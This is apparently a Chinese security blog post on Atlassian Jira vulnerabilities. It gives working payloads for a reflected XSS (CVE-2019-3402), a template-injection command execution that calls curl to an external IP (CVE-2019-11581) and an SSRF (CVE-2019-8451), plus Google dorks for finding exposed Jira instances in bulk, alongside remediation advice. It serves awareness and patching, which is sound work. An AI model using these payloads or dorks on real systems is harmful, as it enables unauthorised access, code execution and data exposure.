Atlassian主要有5款产品,分别面向不同的市场。
JIRA(项目、任务管理软件,2002年上线)、Confluence(企业知识管理与协同软件,2004年上线)、BitBucket(代码库,2010年上线)、HipChat(内部聊天/协作软件,2012年上线)以及JIRA Service Desk(服务台软件,2013年上线)。
JIRA被业界公认为最好的项目管理和敏捷开发管理工具
Confluence被认为是最好用的企业级Wiki和知识管理工具Jira中文介绍:
https://confluence.atlassian.com/pages/viewpage.action?pageId=933888022
Jira各插件说明:
http://confluence.gjingao.com/pages/viewpage.action?pageId=3670502
Jira优秀插件:
http://confluence.gjingao.com/pages/viewpage.action?pageId=328170Confluence中文介绍:
http://confluence.gjingao.com/pages/viewpage.action?pageId=327854Atlassion其他产品介绍:
http://confluence.gjingao.com/pages/viewpage.action?pageId=6520898
CVE-2019-3402:[Jira]XSS in the labels gadget
漏洞描述:
Jira 7.13.3之前的Jira中的ConfigurePortalPages.jspa资源和版本8.1.1之前的8.0.0版允许远程攻击者通过searchOwnerUserName参数中的跨站点脚本(XSS)漏洞注入任意HTML或JavaScript。
ConfigurePortalPages.jspa页面的searchOwnerUserName参数的反射型XSS。
payload:
1 | https://jira.test.com/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=test<script>alert(1)<%2Fscript>t1nmk&Search=Search |
修复建议
1.需要对searchOwnerUserName进行过滤。
2.升级版本
Jira的误配置导致的敏感信息泄露
google dork
此查询列出了其URI中具有“UserPickerBrowser”的所有URL,以查找公开而且不需要经过身份验证的所有配置错误的 JIRA 用户选择器功能。
1 | inurl:/UserPickerBrowser.jspa -intitle:Login -intitle:Log |
此查询列出了所有在其URI中具有“Managefilters”并且文本为“Public”的URL,以便找到所有公开暴露且未经过身份验证的错误配置的JIRA过滤器。
1 | inurl:/ManageFilters.jspa?filterView=popular AND ( intext:All users OR intext:Shared with the public OR intext:Public ) |
此查询列出其URI中具有“ConfigurePortalPages”的所有URL,以查找公开公开的所有JIRA仪表板。
1 | inurl:/ConfigurePortalPages!default.jspa?view=popular |
在进一步侦察(信息收集)时,各公司都有“company.atlassian.net”格式的JIRA URL,因此如果您想检查任何配置错误的过滤器,仪表板或用户选择器功能的公司,您需要 只需将他们的名字放在URL中 (可以用来批量)
1 | http://companyname.atlassian.net/secure/popups/UserPickerBrowser.jspa |
修复建议
其实就是创建过滤器的时候,指定要可见范围: Any logged-in user。
CVE-2019-11581 Atlassian Jira未授权服务端模板注入漏洞
影响版本
- 4.4.x
- 5.x.x
- 6.x.x
- 7.0.x
- 7.1.x
- 7.2.x
- 7.3.x
- 7.4.x
- 7.5.x
- 7.6.x < 7.6.14
- 7.7.x
- 7.8.x
- 7.9.x
- 7.10.x
- 7.11.x
- 7.12.x
- 7.13.x < 7.13.5
- 8.0.x < 8.0.3
- 8.1.x < 8.1.2
- 8.2.x < 8.2.3
修复版本
- 7.6.14
- 7.13.5
- 8.0.3
- 8.1.2
- 8.2.3
漏洞复现
复现条件:
1.开启 - 前台 - 联系网站管理员
2.需要有账户登陆
payload
1 | $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl 118.25.**.**:8000//jas502n//').waitFor() |
https://github.com/jas502n/CVE-2019-11581
修复建议
1.升级到修复版本(7.6.14、7.13.5、8.0.3、8.1.2、8.2.3)。
2.禁用”联系网站管理员“功能。设置=> 系统=> 编辑设置=> 联系管理员表单处选择“关”,然后点击最下面的“更新”保存设置。具体操作方式参考:https://confluence.atlassian.com/adminjiraserver/configuring-the-administrator-contact-form-974375905.html#Configuringtheadministratorcontactform-DisablingtheContactAdministratorsForm
验证生效方法:访问/secure/ContactAdministrators!default.jspa 出现:“您的Jira管理员尚未配置此联系表。”或“Your Jira administrator has not yet configured this contact form”
3.禁止对/secure/admin/SendBulkMail!default.jspa的访问。
CVE-2019-8451/CNNVD-201909-556 Jira Unauthorized SSRF
Jira 版本8.4.0之前的Jira中的/plugins/servlet/gadgets/ makeRequest 资源允许远程攻击者通过服务器端请求伪造(SSRF)漏洞访问内部网络资源的内容。
影响版本
'Version': '< 8.4.0'
修复建议
升级至8.4.0或其以后版本
漏洞复现
/plugins/servlet/gadgets/makeRequest?url={target}@www.baidu.com
使用payload在未授权的情况下进行SSRF成功访问百度
影响范围挺广,批量zoomeye测试了下几乎一半都存在该漏洞
参考:
One Misconfig (JIRA) to Leak Them All- Including NASA and Hundreds of Fortune 500 Companies!